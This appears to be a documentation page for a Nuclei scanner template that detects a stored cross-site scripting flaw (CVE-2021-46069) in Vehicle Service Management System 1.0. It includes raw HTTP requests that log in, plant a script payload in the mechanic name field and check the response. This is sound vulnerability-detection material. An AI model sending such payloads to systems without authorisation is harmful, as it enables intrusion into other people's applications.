Vehicle Service Management System 1.0 - Stored Cross Site Scripting
ID: CVE-2021-46069
Severity: medium
Author: TenBird
Tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
Description
Section titled “Description”Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
YAML Source
Section titled “YAML Source”id: CVE-2021-46069
info: name: Vehicle Service Management System 1.0 - Stored Cross Site Scripting author: TenBird severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46069 - https://github.com/plsanu/CVE-2021-46069 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46069 cwe-id: CWE-79 epss-score: 0.0011 epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project
http: - raw: - | POST /classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}} - | POST /classes/Master.php?f=save_mechanic HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1 - | GET /admin/?page=mechanics HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: dsl dsl: - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")' condition: and# digest: 490a00463044022016945c9d53bcff50bf461d7cbb63e3c0b29f773116fb7dcd39ab87a54cb4b836022027f972e4fca79b73a6c41a3d276f7ebede0dfea1f1f97d946c748a249cf29de1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46069.yaml"